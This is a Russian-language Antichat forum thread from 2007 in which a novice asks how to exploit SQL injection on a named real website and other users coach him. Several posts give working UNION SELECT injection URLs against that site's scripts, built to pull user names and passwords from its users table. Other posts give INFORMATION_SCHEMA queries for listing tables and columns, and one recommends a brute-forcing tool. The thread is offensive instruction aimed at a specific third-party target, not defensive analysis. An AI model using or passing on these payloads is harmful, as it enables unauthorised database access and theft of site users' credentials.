ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj
  #1  
Старый 19.08.2007, 16:15
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
Question SQL-inj

Вот SQL-inj
Код:
http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
 
Ответить с цитированием

  #2  
Старый 19.08.2007, 16:46
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

А там нет скули. Поищи другие скрипты
 
Ответить с цитированием

  #3  
Старый 19.08.2007, 16:48
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

Всмысле, ошибка же есть?
 
Ответить с цитированием

  #4  
Старый 19.08.2007, 17:18
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Там не смотрел, но вот тут она точно есть

Код:
хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
Цитата:
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(name,0x3a,password)+from+mai n_users/*

Последний раз редактировалось Ksander; 20.08.2007 в 14:11..
 
Ответить с цитированием

  #5  
Старый 20.08.2007, 13:33
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
 
Ответить с цитированием

  #6  
Старый 20.08.2007, 13:46
Аватар для phol1eadeux
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

Цитата:
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Можно вручную, либо специализированными программами-брутерами
 
Ответить с цитированием

  #7  
Старый 20.08.2007, 13:48
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

Какими например, я таких не видел.
 
Ответить с цитированием

  #8  
Старый 20.08.2007, 13:55
Аватар для phol1eadeux
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

SQL Bruter - одна из них
 
Ответить с цитированием

  #9  
Старый 20.08.2007, 14:02
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от Qwertison  
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?

Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*

Последний раз редактировалось Ksander; 20.08.2007 в 14:33..
 
Ответить с цитированием

  #10  
Старый 20.08.2007, 14:24
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ksander  
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

Код:
union select TABLE_NAME from INFORMATION.SCHEMA_TABLES limit 0,1/*
А потом колонки в интересующей нас табле:

Код:
union select COLUMN_NAME from INFORMATION.SCHEMA_COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ